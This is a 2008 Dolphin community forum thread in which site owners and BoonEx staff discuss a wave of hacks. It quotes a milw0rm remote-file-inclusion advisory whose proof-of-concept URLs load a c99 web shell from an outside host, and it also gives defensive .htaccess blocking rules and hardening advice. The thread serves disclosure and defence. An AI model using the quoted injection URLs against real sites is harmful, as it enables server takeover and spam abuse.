Dolphin not secure?? Hacked!

Hi,

my site (v6.0.5) was hacked today! Now I read this article:

http://www.astalavista.com/index.php?section=exploits&cmd=details&id=6128

Any solution????

9 Jul 2008

I have an idea for this. I will analyze it once again and come up with a fix.

Regards,

Praveen

http://www.dolphinpros.com

----
9 Jul 2008

We have a major problem with this too.  Boonex staff - any advice?  For now we have had to take Dolphin offline. The hackers are still trying to access, even though we have taken it offline, but they were able to compromise server due to this - seems to be a MAJOR problem.

Thank

10 Jul 2008

Can someone PLEASE post (or email me) the details from that page Singlemonster is refering to!! I'm not able to access that link but I would LOVE to know what it says!!

 

 

 

BoonEx Certified Host: Zarconia.net - Fully Supported Shared and Dedicated for Dolphin
10 Jul 2008

The page says :

 

Name Of Script : Dolphin PHP

# Version : 6.1.2

# Download From : http://heanet.dl.sourceforge.net/sourceforge/boonex-dolphin/Dolphin-v.6.1.2-Free.zip

# Found By : RoMaNcYxHaCkEr [ RoMaNTiC-TeaM ]

# My Home Page : WwW.4RxH.CoM [ We Will Be Back Soon ] & Tryag.cc/cc [ Member From Tryag Forum ]

# Type Of Exploit : RFI In Multiple Files

# Introduce : Some Of Modules Is Infected And Some In Pulgins You Will See Below

# POC :

http://WwW.4RxH.CoM/Dolphin-v.6.1.2-Free/plugins/safehtml/HTMLSax3.php?dir[plugins]=http://rxh.freehostia.com/shells/c99in.txt?

http://WwW.4RxH.CoM/Dolphin-v.6.1.2-Free/plugins/safehtml/safehtml.php?dir[plugins]=http://rxh.freehostia.com/shells/c99in.txt?

http://WwW.4RxH.CoM/Dolphin-v.6.1.2-Free/ray/modules/global/inc/content.inc.php?sIncPath=http://rxh.freehostia.com/shells/c99in.txt?

# Also We See RFI In Different Files But .htaccess Is Deny All Files In Some Path

# Greet To : Tryag TeaM ,Injector TeaM ,Unknown Hacker , aLwHeD

# Note : No One Perfect  :)

# rXh

# bEST wISHES
# milw0rm.com [2008-07-08]

10 Jul 2008

And by the way this morning my community portal http://ecovoiceonline.org only had the text "Owned by Spanish Hackers" on the front page.

 

I opened my cpanel at Hostgator, looked at the index.php file, which had all the code deleted and replaced by the Spanish Hacker's text. I deleted the index.php file and uploaded a new index file from my backup and the site is up again.

 

But what scares me is not knowing where is the vulnerability and what to do to prevent further hacking.

10 Jul 2008

And by the way this morning my community portal http://ecovoiceonline.org only had the text "Owned by Spanish Hackers" on the front page.

I opened my cpanel at Hostgator, looked at the index.php file, which had all the code deleted and replaced by the Spanish Hacker's text. I deleted the index.php file and uploaded a new index file from my backup and the site is up again.

But what scares me is not knowing where is the vulnerability and what to do to prevent further hacking.

are you on a shared hosting account? and i think i read where this happens on any shared hosting environment, vps is included in shared. yes the title, but anybody can change the title, read what it says after the "?" ?sIncPath=http://rxh.freehostia.com/shells/c99 this was installed in the plugins directory from within the server, i can assure you of that.

later,

DosDawg

When a GIG is not enough --> Terabyte Dolphin Technical Support - Server Management and Support
10 Jul 2008

We have a major problem with this too.  Boonex staff - any advice?  For now we have had to take Dolphin offline. The hackers are still trying to access, even though we have taken it offline, but they were able to compromise server due to this - seems to be a MAJOR problem.

Thank

kev, were are you hosted at, have your support run a search on all the files on the server and look for c99 or shell within the file. i will do it if you want me to and you have shell access?

later,
DosDawg

When a GIG is not enough --> Terabyte Dolphin Technical Support - Server Management and Support
10 Jul 2008

It's a definite security hole - we have had to disable dolphin directory completely due to the mess these hackers have made - they are still tryign to do more as we speak (Apache logs show them still hammering away, from different IPs all the time), but are locked out.

I'd recommend disabling your Dolphins until we hear news from Boonex on this (or at least do so at the first sign of trouble, and hope you didnt do so too late) - and send an email to Boonex too about it in case they see emails before forums.

10 Jul 2008

We have a major problem with this too.  Boonex staff - any advice?  For now we have had to take Dolphin offline. The hackers are still trying to access, even though we have taken it offline, but they were able to compromise server due to this - seems to be a MAJOR problem.

Thank

kev, were are you hosted at, have your support run a search on all the files on the server and look for c99 or shell within the file. i will do it if you want me to and you have shell access?

later,
DosDawg

I have shell access - will check this out now - thanks.

Kev

10 Jul 2008

Oh by the way found the same security alert in http://securityreason.com/exploitalert/4285

10 Jul 2008

grepping for c99 turned up a lot of results - some very suspicious - I have techs checking them out now.

grepping for shell is showing a lot of hits but so far they seem like likely legitimate cases to me (inside buildapache, perlinstaller etc)

Kev

... Correction: seems not so suspicious after all.  Files listed were all either outside public access areas, or have legitimate use of c99, for example in hexcodes inside html files, jpg or gif files when searched as text, etc.  And nothing at all was inside the Dolphin directory (I was grepping the entire server).  Back to the drawing board I think.

10 Jul 2008

grepping for c99 turned up a lot of results - some very suspicious - I have techs checking them out now.

grepping for shell is showing a lot of hits but so far they seem like likely legitimate cases to me (inside buildapache, perlinstaller etc)

Kev

... Correction: seems not so suspicious after all.  Files listed were all either outside public access areas, or have legitimate use of c99, for example in hexcodes inside html files, jpg or gif files when searched as text, etc.  And nothing at all was inside the Dolphin directory (I was grepping the entire server).  Back to the drawing board I think.

i will look at this further and report back might need to lookup some of the source code that is used within that file

holla,

DosDawg

When a GIG is not enough --> Terabyte Dolphin Technical Support - Server Management and Support
10 Jul 2008

Damn it! Yeah, after it is posted on one "security site" (which are normally really hacker sites) it will spread like wild fire... I'm at work right now so I don't have the exact code but I have RFI blocked on all my sites through the .htaccess .. It's simple to do, all you have to do is block any command line that has http, https, or ftp in it. So even if someone finds a vulnerable file and then types "http://www.yoursite.com/vulnerablefile.php?http://www.hackersite.com/c99" they will get a 500 server error because it had http in the command line after the file.

 

This DOES screw up some legitimate things.. like I can't put a google search bar on my sites because google passes info in that same manner... but for me it is worth it to not constantly worry about someone finding something like this and using it :-)

 

I'll post the code when I get home.

 

By the way, aren't you guys amazed that when something like this pops up half the people here ignore it??

 

Mike

BoonEx Certified Host: Zarconia.net - Fully Supported Shared and Dedicated for Dolphin
10 Jul 2008

Humorous hackers :)
Has anybody read this before?
http://www.php.net/register_globals manual

It's not exploit, it's just a lack of php < version 4.2
Previous PHP couldn't accept any GET/POST variables, and developers of PHP invented something new, hah

So......,

>When on, register_globals will inject your scripts with all sorts of variables

and was possible to override variables and functions,

this is not lack of our Dolphin,

Since the first Dolphin version we provide manual on how to switch off this php option, just check your:

.htaccess

there is a line:

php_flag register_globals Off

More, developers of PHP disable this option in distib since 4.2 (seems)

So we don`t see here any issue for this

Check the PHP history and I'm sure, you'll find a lot of useful information about it.

This was a common PHP language problem, its earliest problems.

10 Jul 2008

since first versions of dolphin we provide manual switching off this option of php, just check yours:

.htaccess

here always line:

php_flag register_globals Off

Hey AndreyP,

thanks for this hint!

I checked my other dolphin prohject running 6.0003 and there it is inside the .htaccess. Then i checked my fresh installed .htacess and there was no php_flag register_globals Off inside.

So i just putted the line inside and thats it.

Maybe you can write it back to the default .htaccess.

Greets,

Jerry

10 Jul 2008

So basically one php setting determines if your site is "hack proof" or "hack friendly".. ooookkkkkk. For those of you who want to block ALL "remote file include" attempts put this in your .htaccess inside the mod_rewrite block:

 

RewriteCond %{QUERY_STRING} ^http   [OR]
RewriteCond %{QUERY_STRING} ^.+www\.  [OR]
RewriteCond %{QUERY_STRING} ^.+https  [OR]
RewriteCond %{QUERY_STRING} ^.+ftp
RewriteRule .* - [L,F]
RewriteCond %{HTTP_USER_AGENT} ^libwww [OR]
RewriteCond %{HTTP_USER_AGENT} ^Wget
RewriteRule .* - [F]

 

 

This will block any "query string" that has http, https, ftp, or www in it. It will also block ANY user agent that starts with "libwww" (which is what 99% of these bad bots use) and "Wget" (which is a site scraper).

 

If you use anything on your server that gets files by the command line you can't use this because it will block that too.. like www.yoursite.com/filegetter.php?file=http://www.yourothersite.com/display.txt but I only know of a few things that work that way (Google search bar for one).

 

thanks

Mike

BoonEx Certified Host: Zarconia.net - Fully Supported Shared and Dedicated for Dolphin
10 Jul 2008

Humorous hackers :)
Has anybody read this before?
http://www.php.net/register_globals manual

It's not exploit, it's just a lack of php < version 4.2
Previous PHP couldn't accept any GET/POST variables, and developers of PHP invented something new, hah

So......,

>When on, register_globals will inject your scripts with all sorts of variables

and was possible to override variables and functions,

this is not lack of our Dolphin,

Since the first Dolphin version we provide manual on how to switch off this php option, just check your:

.htaccess

there is a line:

php_flag register_globals Off

More, developers of PHP disable this option in distib since 4.2 (seems)

So we don`t see here any issue for this

Check the PHP history and I'm sure, you'll find a lot of useful information about it.

This was a common PHP language problem, its earliest problems.

Can I clarify please:

1.  Is this the official Boonex response  (I do not know if you are Boonex staff)?

2.  You say it is just an issue of register_globals vulnerability, but that .htaccess supplied with the script has a flag to turn it off anyway, so it shouldn't be a problem.  I have just checked the .htaccess in the main directory of our dolphin installation and there is no php_flag for reg_globals there. Or perhaps I am misunderstanding you - you may be saying we should add the flag there ourselves? (If so, why not just add it into the distributed file package?)

3.  As I understand it, register_globals is a problem because it opens holes for poorly written code to expose vulnerabilities - Register_Globals does not expose any vulnerabilities unless the script allows it to.  So surely a more mature response is to close the hole - so that it doesn't matter if register_globals is on or off.

In a perfect world, sure, the simple solution is to just turn off register_globals on the server.  But this ignores the fact that there a great many sites running scripts that still depend on it (and many of those do not necessarily have gaping security holes).

When the hackers list it as a vulnerability they are correct.  If register_globals needs to be off in order to run the script safely, that really REALLY needs to be spelled out as a REQUIREMENT of the script.

I just can't understand - why not make the script safe, rather than have a need to have register_globals off (something that most end-users would not have the slightest idea about and would not understand if you explain it to them)?

Would like your thoughts on this - thanks.

10 Jul 2008

I have the same problem. My provider wrote me an email that someone spread out spam by my site. The problem file is: /ray/modules/global/inc/content.inc.php.


They closed the hole temporarily with the following lines in the .htaccess

RewriteEngine On
RewriteCond %{QUERY_STRING} (.*)=http(.*) [NC,OR]
RewriteCond %{QUERY_STRING} (.*)urlx=(.*) [NC]
RewriteRule ^(.*) - [F]
10 Jul 2008

I got the same little problems with both on my Dolphin site this morning, the ID 1 accounts has different paswords. I had to change both.

Kids first
10 Jul 2008

What happens if you are on a shared server like Yahoo and they don't allow you to use .htaccess files? How do I close this security breach?

 

The culprit definitely is /ray/modules/global/inc/content.inc.php. 

 

Do I just overwrite this with a fresh content.inc.php file and I'm good or do I need to do something inside of this file to safeguard myself again?

 

I'm afraid to find out what has happened to the site once i get it back up and running!

 

Dolaugh

10 Jul 2008

I have the same problem. My provider wrote me an email that someone spread out spam by my site. The problem file is: /ray/modules/global/inc/content.inc.php.


They closed the hole temporarily with the following lines in the .htaccess

RewriteEngine On
RewriteCond %{QUERY_STRING} (.*)=http(.*) [NC,OR]
RewriteCond %{QUERY_STRING} (.*)urlx=(.*) [NC]
RewriteRule ^(.*) - [F]

This type of approach - also touched on earlier by mscott, gives me an idea.

Would it not be possible to use a similar rule in .htaccess to grab the URL and/or IP address and then pass them to a php file (or other approach) which could in turn block them as mod_sec rules or add to iptables?  Seems to me like there would be permission issues though - beyond my ability in PHP or regular expression writing.

Another thing is an issue of folders with 777 perms - can anyone confirm that a fresh install/upgrade of Dolphin does not leave any folders like cache and lang with permissions of 777?  I seem to recall when I installed, that the list of folders you need to set to 777 for the install was quite long, but the list of folders the install program tells you to set back to 755 afterwards is quite short.  Wouldn't this also be a security concern?

Thank

10 Jul 2008

What happens if you are on a shared server like Yahoo and they don't allow you to use .htaccess files? How do I close this security breach?

The culprit definitely is /ray/modules/global/inc/content.inc.php.

Do I just overwrite this with a fresh content.inc.php file and I'm good or do I need to do something inside of this file to safeguard myself again?

I'm afraid to find out what has happened to the site once i get it back up and running!

Dolaugh

/ray/modules/global/inc/content.inc.php is only one of the files we have seen targeted.

Some others include:

/news/plugins/safehtml/HTMLSax3.php?dir[plugins]=

and also the main index.php if I remember right.

10 Jul 2008

Yes the main index.php file was targeted for me yesterday - MESSAGE for index file is generally "This Site is now Owned by Spanish Hackers"....today it was : /ray/modules/global/inc/content.inc.php with the wording " helppppp them!!!!


HOW would someone who doesn't use .htaccess files keep these files from being hacked?? Any ideas? Someone surely has a solution they could offer besides changing WEB hosts! LOL

 

I swear...this is such a burden....

 

DoLaugh

10 Jul 2008

Yes the main index.php file was targeted for me yesterday - MESSAGE for index file is generally "This Site is now Owned by Spanish Hackers"....today it was : /ray/modules/global/inc/content.inc.php with the wording " helppppp them!!!!


HOW would someone who doesn't use .htaccess files keep these files from being hacked?? Any ideas? Someone surely has a solution they could offer besides changing WEB hosts! LOL

I swear...this is such a burden....

DoLaugh

That is tricky.  Changing hosts is definitely the number 1 thing I'd suggest.  But you could also ask your current host to turn off Register_Globals locally for your account if they have it on server wide.  We are looking into mod_security as another option, but that wouldn't be much use to you I'm afraid.

Other than that, you are describing an excellent example of why I am saying the solution is for Boonex to fix the code itself rather than rely on the bandaid approach of turnign register_globals off.  We will have to see how they respond.

10 Jul 2008

My website also got hacked today. Got a warning from host that we are spaming. Apprently hackers were spaming on our behalf, how nice of them. Here is the message: http://abuseinfo.iecc.com/khv/8477716

 

Any ideas? How to patch this up?

10 Jul 2008

My site http://ecovoiceonline.org appears to have got hacked again. This morning all I see is the message :

 

not be removed from the source code.
Warning: Cannot modify header information - headers already sent by (output started at /home/mokhsein/public_html/ecovoiceonline/ray/modules/global/inc/content.inc.php:1) in /home/mokhsein/public_html/ecovoiceonline/inc/design.inc.php on line 495

Fatal error: Call to undefined function getrayintegrationjs() in /home/mokhsein/public_html/ecovoiceonline/inc/design.inc.php on line 425

 

 

I tried uploading a new design.inc.php file and also ray/modules/global/inc/content.inc.php and it's ok now. How long do we have to keep doing this kind of piecemeal repair jobs?

 

11 Jul 2008

I was targeted as well.  Seems to be same group just different angles.  This is what they have left for me:

 

Hacked By SnL_ayaz_



 

 

Turkish Hacker

 

 

One Turk-Against The World-No War-Forever World Peace

mail to:SnL_ayaz_@hotmail.com

websites:http://bilginin--adresi.blogspot.com Bilginin Adresi Bilginin Tek Kaynağı
Warning: main(BX_DIRECTORY_PATH_INCprofiles.inc.php): failed to open stream: No such file or directory in /hsphere/local/home/rprinc/windpsalms.com/admin/index.php on line 26

Fatal error: main(): Failed opening required 'BX_DIRECTORY_PATH_INCprofiles.inc.php' (include_path='.:/usr/local/lib/php:/usr/local/share/pear') in /hsphere/local/home/rprinc/windpsalms.com/admin/index.php on line 26

They have replaced my inc/header.inc.php.

Any ideas on how I restore it, and how I keep it from happening again?

Thanks,

Roy

11 Jul 2008

I was targeted as well.  Seems to be same group just different angles.  This is what they have left for me:

Hacked By SnL_ayaz_



Turkish Hacker

One Turk-Against The World-No War-Forever World Peace

mail to:SnL_ayaz_@hotmail.com

websites:http://bilginin--adresi.blogspot.com Bilginin Adresi Bilginin Tek Kaynağı
Warning: main(BX_DIRECTORY_PATH_INCprofiles.inc.php): failed to open stream: No such file or directory in /hsphere/local/home/rprinc/windpsalms.com/admin/index.php on line 26

Fatal error: main(): Failed opening required 'BX_DIRECTORY_PATH_INCprofiles.inc.php' (include_path='.:/usr/local/lib/php:/usr/local/share/pear') in /hsphere/local/home/rprinc/windpsalms.com/admin/index.php on line 26

They have replaced my inc/header.inc.php.

Any ideas on how I restore it, and how I keep it from happening again?

Thanks,

Roy

need to switch to a host where the server is tighter than a dicks hatband? give me a shout. monitored 24/7 for events of this magnitude.

shared hosting account obviously. give me a shout man, and see if we can get you fixed up.

later,

DosDawg

When a GIG is not enough --> Terabyte Dolphin Technical Support - Server Management and Support
11 Jul 2008

Hmmm, what hypocrisy!

 

His actions are not really conducive to "No War - Forever World Peace", are they?

11 Jul 2008

Is Boonex not concerned with this problem?

11 Jul 2008

Ohh again :)

why you even can`t goto

Members -> Boonex Team

Here all Boonex staff, thanks for alls

so again,

you should have

php_flag register_globals Off
to prevent been hacked

all hosts must provide this variable as 'Off' by default.

If not - this is not secure host

If your hosting don`t give possibility to use .htaccess ask your host to enable this possibility and even switch

php_flag register_globals Off
this is common security issue, strange that your host don`t provide this, which version of php it use? 3.0? :)

since 4.2 this variable is Off as default

Regards,

BoonEx staff

11 Jul 2008

I just asked my host to switch globals off.  They are more concerned now with the security gaps in the software.  The hackers upon investigation have been having a field day.  Thanks to DosDawg we have found the hackers files.  They have complete control over everything, including passwords, webshell, user info, email parsing, and sadly open ports straight into my users computers who are on line and may not have proper firewalls.  This is pretty bad.  Turning globals off did not work we were still able to access the software and control whatever we wanted. 

 

I can remove the software, I am going to place all the security measures mentioned here.  Please, please, please tell me someone how do I recreate the header.inc.php?

 

 

 

Thank you,

Roy

 

P.S.  please do not tell me a complete new install.

11 Jul 2008

hello,

thanks for zhe info!

http://handytariftipp.de/
11 Jul 2008

Humorous hackers :)
Has anybody read this before?
http://www.php.net/register_globals manual

It's not exploit, it's just a lack of php < version 4.2
Previous PHP couldn't accept any GET/POST variables, and developers of PHP invented something new, hah

So......,

>When on, register_globals will inject your scripts with all sorts of variables

and was possible to override variables and functions,

this is not lack of our Dolphin,

Since the first Dolphin version we provide manual on how to switch off this php option, just check your:

.htaccess

there is a line:

php_flag register_globals Off

More, developers of PHP disable this option in distib since 4.2 (seems)

So we don`t see here any issue for this

Check the PHP history and I'm sure, you'll find a lot of useful information about it.

This was a common PHP language problem, its earliest problems.

Just a lack pf PHP?

Curious: my provider uses PHP Version 5.2.5 and register_globals is OFF an my site was hacked.

What's now? You said I can't be hacked with PHP > 4.2 and register_global OFF?!?!

Cheers

11 Jul 2008
Hello tomsche! You should also check permissions for inc and periodic folders (should be 755), files periodic/*.php, ray/modules/global/inc/header.inc.php (should be 644) after installation. Provide me your FTP access and if possible server logs in day of hack, we'll investigate it for getting exact reason. Regards
11 Jul 2008

I completed a new test install to see what folders are left as 777 permissions - even after the recommended steps of resecuring as per the installation instructions.  This is the list I find are still 777:

# find . -perm 777 -type d

./ray/modules/board/files
./ray/modules/chat/files
./ray/modules/im/files
./ray/modules/movie/files
./ray/modules/mp3/files
./ray/modules/music/files
./orca/cachejs
./orca/classes
./orca/conf
./orca/js
./orca/layout
./orca/log
./media/images
./media/images/banners
./media/images/blog
./media/images/classifieds
./media/images/gallery
./media/images/profile
./media/images/profile_bg
./media/images/promo
./media/images/promo/original
./media/images/sdating
./media/images/sharingImages
./media/sound
./media/video
./langs
./groups/gallery
./groups/orca/cachejs
./groups/orca/classes
./groups/orca/js
./groups/orca/layout
./groups/orca/log
./cache

Are these not serious insecurities?  Is it necessary to secure these directories in other ways.

Thank

11 Jul 2008

Hi,

 

I mentioned this to Hostmonster tech support this afternoon and they said register_globals is off by default with them.

 

When I sent them that astalavista link they said this -

 

[11:55:30 AM]: Hmm

[11:55:56 AM]: Any shared host is going to have those vulnerabilities, whether it's us, Ipower, GoDaddy, Network Solutions, etc.

 

[11:56:09 AM]: And even then, nothing's ever hack-free.

 

 

Interesting.

 

Cheers

 

Max

11 Jul 2008

This is not Boonex's problem but rather server hardening and security issues. Even so, servers can never be 100% full-proof. No matter what you do, hackers will try and hack your server daily. We run shared hosting for dolphin and this is what we have done to minimize server intrusions.

1) Global Register set to "OFF"

2) Mod Security Installed on cpanel

3) Install SUPHP on server

4) Enable firewall to immediately block the intruder

Enable Mod Security to block the following:

a) SQL injection

b) Shell Script execution esp malicious ones that runs spam

c) External circumvention of URL links esp ones that links to .txt

d) Enable automatic blockage in Mod Security settings when a hack is attempted

Of all the methods above we have found that mod security works the best in our situation. If you are running a dedicated server, have your system admin implement security hardening on your server.

11 Jul 2008

I have several Dolphin sites that were also hacked.

I received an email from my hosting provider that stated: "Your hosting account has been attacked by an insecure php script. As a result of as a result of this attack a large amount of spam has been sent by the following script: /plugins/tiny_mce/sendmail.php".

After investigation my host reported "The intrusion was processed through your script /ray/modules/global/inc/content.inc.php".

I am no expert, but I would assume that many of us are hosted on various different providers. I have a little problem with the notion that we are expected to believe that all those many hosting providers are at fault when Dolphin is the common denominator throughout.

11 Jul 2008

Exactly my own thoughts Dwain!

 

Here's what Hostgator just had to say about 777 directory permissions:

Hostgator: Welcome to HostGator Live Chat, how may I assist you?


RB:
Hi! (and thanks) .... What are the "REAL and ACTUAL" dangers of having 777 directory permissions please?


Hostgator
.: With permissions set to 777, you allow access of external users to your files to read, write and execute files as they please. In other words an external user can edit your files within the server having these permissions and do many other things with it. It inevitably compromises your files and your account in general.


RB:
But they have to have REAL access to it correct ? i.e. through shell or ftp, etc?  Can they do anything through an external http web browser?


Hostgator
.: If they ftp through a browser to that account and the permissions are compromised then they may be able to modify certain contents of the directory. And this can be done even if they do not have shell access.


RB:
ok thanks! Have a great day!


Any reason that the installations cannot run with 755 permissions which goes without saying would be MUCH safer?


What now ye say Boonex???

11 Jul 2008

I havent been telling this since dolphin 6.0 but nobody gives a damn.Dolphin uses to many fwrite, fopen and file function which open doors to security threat and also burden the server.

11 Jul 2008

Kill your Dolphin! It is NOT SAFE!

 

My Dolphin was hacked and menay malicious php scripts uploaded to my server.

 

The Boonex techs don't respond, and not seem to care that their script is VERY VULNERABLE!

 

Switch social networking scripts now!

12 Jul 2008

of all those who proclaim they have been hacked, please provide us with who your host is, and also would like to look at your phpinfo(), yeah the host tells you that register_globals=OFF, but have you verified that? there are a few scripts that require register_globals to be on, exactly why, i do not know, but those are scripts i would not run.

im just curious as to where all of you guys are hosted, and would like to verify that register_globals=OFF. so i see what AndreyP is posting, i know on tallyplayer, his register_globals were on. i am sure he believed them to be turned off, but you will find that if james with a hosting account that he is paying 25 dollars a month for, is asking for register_globals to be turned on, and you are hosting on that same account for $1.99 and you want register_globals to be off, what do you think they are going to do?

well i can tell you its evident: when in rome do as the romans, they turn them on, and expecting you to never view your phpinfo(), nor read your server logs, they just get away with it.

well that is just my 3 cents worth. gotta go got things to do, good luck to all, and hope things shake out.

later,
DosDawg

When a GIG is not enough --> Terabyte Dolphin Technical Support - Server Management and Support
12 Jul 2008

Ok the reason for the mass hackings is last week a hacker group put out one of those "security alerts" for Dolphin 6.1.2... for anyone who isn't familiar with this process here is how it works:

 

1. A REAL hacker downloads a piece of software and pours over the code until he finds a file that is vulnerable to RFI, XSS or SQL injection.

 

2. He posts a "security alert" (or whatever you want to call it) on one of the major hacker sites (like milw0rm) to impress his peers. Some of these sites are openly for hackers, others are made to look like security sites.

 

3. The advisory spreads like wildfire because almost all these sites pull their info from the same spot.

 

4. Someone writes an automated program to search for the sites on Google  and "deface" them.

 

5. Thousands of "script kiddies" download this program and let it go (with their own "payload" like "You have been pwned by spanish hackers").. these automated programs run around the clock until the kids get tired and move on.

 

 

What NORMALLY happens (like with phpbb or Joomla) is the developers release a patch within 24 hours to patch the hole... but this advisory came out on 7/08/08 . And YES this does happen to lots of software developers, but this is the FIRST time I have ever seen it handled in this manner.

 

Now to cover several of the posts:

 

1. DoLaugh.. any software that NEEDS 777 directories to function HAS to have .htaccess files to protect it.. so switching hosts is really the only solution to prevent hacker problems in the future. Even if Boonex fixes the holes you will still need the 777 dirs.

 

2. 777 dirs ARE insecure... even more so on a host like Hostforweb that has php running as a module. My only advice is to make SURE you have an .htaccess in each 777 dir that blocks any script from running.

 

3. About blocking IPs. I tried to go this route but if you look at your logs you will notice that not only do they change IPs each visit they change IPs constantly DURING each visit! For instance you will see a string of get requests like this:

 

207.23.45.222

207.23.45.254

207.23.45.242

207.23.45.424 

 

Almost ALL the RFI attempts I see blocked in my logs are from the R.I.P.E network.. which is a semi-anonymous network. I had all the RIPE IPs blocked for a while but after some research I discovered that most of Europe comes through those IPs :-(  I finally unblocked them and just put the htaccess rules in place to block certain query stings and user agents..

 

Well there was my rant for the month, I'll crawl back in my hole now.

Mike

BoonEx Certified Host: Zarconia.net - Fully Supported Shared and Dedicated for Dolphin
12 Jul 2008

Ok my sites are operational.  The hacks that have left you with attacked by turks or owned by spanish hackers has probably written over your inc/header.inc.php file.  This file creates with the questions you were asked at install to fill in.  Simply remembering that info and plugging it in to a template, then placing it in your yoursite/inc/header.inc.php will fix most of the problem.  From there like I said earlier you need to look at a lot of files to make sure they did not leave any malicious content behind.  So that leaves us with the obvious question, Where do I get a header.inc.php template?

 

Try this for version 6.1.2:  just fill in the yellow highlights with your info put in notepad or editor name header.inc.php and copy it to you inc/ directory.

 

<?

/***************************************************************************
*                            Dolphin Smart Community Builder
*                              -----------------
*     begin                : Mon Mar 23 2006
*     copyright            : (C) 2006 BoonEx Group
*     website              : http://www.boonex.com/
* This file is part of Dolphin - Smart Community Builder
*
* Dolphin is free software. This work is licensed under a Creative Commons Attribution 3.0 License.
* http://creativecommons.org/licenses/by/3.0/
*
* Dolphin is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
* without even the implied warranty of  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
* See the Creative Commons Attribution 3.0 License for more details.
* You should have received a copy of the Creative Commons Attribution 3.0 License along with Dolphin,
* see license.txt file; if not, write to marketing@boonex.com
***************************************************************************/

$site['ver']               = '6.1';
$site['build']             = '2';
$site['title']             = 'YOUR SITE TITLE';
$site['url']               = "http://YOUR SITE.COM";
$admin_dir                 = "admin";
$site['url_admin']         = "{$site['url']}$admin_dir/";
$site['url_aff']           = "{$site['url']}aff/";
$site['profileImage']      = "{$site['url']}media/images/profile/";
$site['profileBackground'] = "{$site['url']}media/images/profile_bg/";
$site['profileSound']      = "{$site['url']}media/sound/";
$site['profileVideo']      = "{$site['url']}media/video/";
$site['sharingImages']     = "{$site['url']}media/images/sharingImages/";

$site['mediaImages']       = "{$site['url']}media/images/";
$site['gallery']           = "{$site['url']}media/images/gallery/";
$site['flags']             = "{$site['url']}media/images/flags/";
$site['blogImage']         = "{$site['url']}media/images/blog/";
$site['sdatingImage']      = "{$site['url']}media/images/sdating/";
$site['smiles']            = "{$site['url']}media/images/smiles/";
$site['banners']           = "{$site['url']}media/images/banners/";
$site['imagesPromo']       = "{$site['url']}media/images/promo/";
$site['tmp']               = "{$site['url']}tmp/";
$site['preCheckout']       = "{$site['url']}checkout/pre_checkout.php";
$site['plugins']           = "{$site['url']}plugins/";
$site['base']              = "{$site['url']}templates/base/";

 


$site['email']             = "EMAIL ADDRESS";
$site['email_notify']      = "EMAIL ADDRESS";
$site['bugReportMail']     = "EMAIL ADDRESS";

 

$dir['root']               = "YOUR ROOT DIRECTORY PATH TO SCRIPT";
$dir['inc']                = "{$dir['root']}inc/";
$dir['profileImage']       = "{$dir['root']}media/images/profile/";
$dir['profileBackground']  = "{$dir['root']}media/images/profile_bg/";
$dir['profileSound']       = "{$dir['root']}media/sound/";
$dir['profileVideo']       = "{$dir['root']}media/video/";
$dir['sharingImages']      = "{$dir['root']}media/images/sharingImages/";

$dir['mediaImages']        = "{$dir['root']}media/images/";
$dir['gallery']            = "{$dir['root']}media/images/gallery/";
$dir['flags']              = "{$dir['root']}media/images/flags/";
$dir['blogImage']          = "{$dir['root']}media/images/blog/";
$dir['sdatingImage']       = "{$dir['root']}media/images/sdating/";
$dir['smiles']             = "{$dir['root']}media/images/smiles/";
$dir['banners']            = "{$dir['root']}media/images/banners/";
$dir['imagesPromo']        = "{$dir['root']}media/images/promo/";
$dir['tmp']                = "{$dir['root']}tmp/";
$dir['cache']              = "{$dir['root']}cache/";
$dir['plugins']            = "{$dir['root']}plugins/";
$dir['base']               = "{$dir['root']}templates/base/";
$dir['classes']            = "{$dir['inc']}classes/";

$video_ext                 = 'avi';
$MOGRIFY                   = "/usr/X11R6/bin/mogrify";
$CONVERT                   = "/usr/X11R6/bin/convert";
$COMPOSITE                 = "/usr/X11R6/bin/composite";
$PHPBIN                    = "/usr/local/bin/php";

$db['host']                = 'DB HOST (USUALLY LOCAL HOST)'
$db['sock']                = '';
$db['port']                = 'DB PORT';
$db['user']                = 'DB USER';
$db['passwd']              = 'DB PASSWORD';
$db['db']                  = 'DB NAME';


define('BX_DIRECTORY_PATH_INC', $dir['inc']);
define('BX_DIRECTORY_PATH_ROOT', $dir['root']);
define('BX_DIRECTORY_PATH_BASE', $dir['base']);
define('BX_DIRECTORY_PATH_CACHE', $dir['cache']);
define('BX_DIRECTORY_PATH_CLASSES', $dir['classes']);

define('DATABASE_HOST', $db['host']);
define('DATABASE_SOCK', $db['sock']);
define('DATABASE_PORT', $db['port']);
define('DATABASE_USER', $db['user']);
define('DATABASE_PASS', $db['passwd']);
define('DATABASE_NAME', $db['db']);

 

//check safe_mode
if( (int)ini_get( 'safe_mode' ) )
{
 echo '<b>Warning.</b> Dolphin cannot work in safe mode';
 exit;
}

//check mbstring
if( !extension_loaded( 'mbstring' ) ) {
 echo '<b>Warning!</b> Dolphin cannot work without <b>mbstring</b> extension.
  Please go to the
  <a href="http://www.boonex.com/trac/dolphin/wiki/GenDolTShooter">Dolphin Troubleshooter</a>
  and solve the problem.';
 exit;
}

//check correct hostname
$aUrl = parse_url( $site['url'] );
if( isset($_SERVER['HTTP_HOST']) and $_SERVER['HTTP_HOST'] != $aUrl['host'] and $_SERVER['HTTP_HOST'] != $aUrl['host'] . ':80' )
{
 header( "Location:http://{$aUrl['host']}{$_SERVER['REQUEST_URI']}" );
 exit;
}

 

// check if install folder exists
if ( file_exists( $dir['root'] . 'install' ) )
{
 $ret = <<<EOJ
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
 <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
  <head>
   <title>Dolphin Smart Community Builder Installed</title>
   <link href="install/general.css" rel="stylesheet" type="text/css" />
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
  </head>
  <body>
   <div id="main">
   <div id="header">
    <img src="install/images/boonex_logo.gif" alt="" /></div>
   <div id="content">
    <div class="installed_pic">
     <img alt="Dolphin Installed" src="install/images/dolphin_installed.jpg" />
   </div>

   <div class="installed_text">
    Please, remove INSTALL directory from your server and reload this page to activate your community site.
   </div>
  </body>
 </html>
EOJ;
 echo $ret;
 exit();
}

// set error reporting level
error_reporting(E_ALL & ~E_NOTICE);
set_magic_quotes_runtime(0);
ini_set('magic_quotes_sybase', 0);

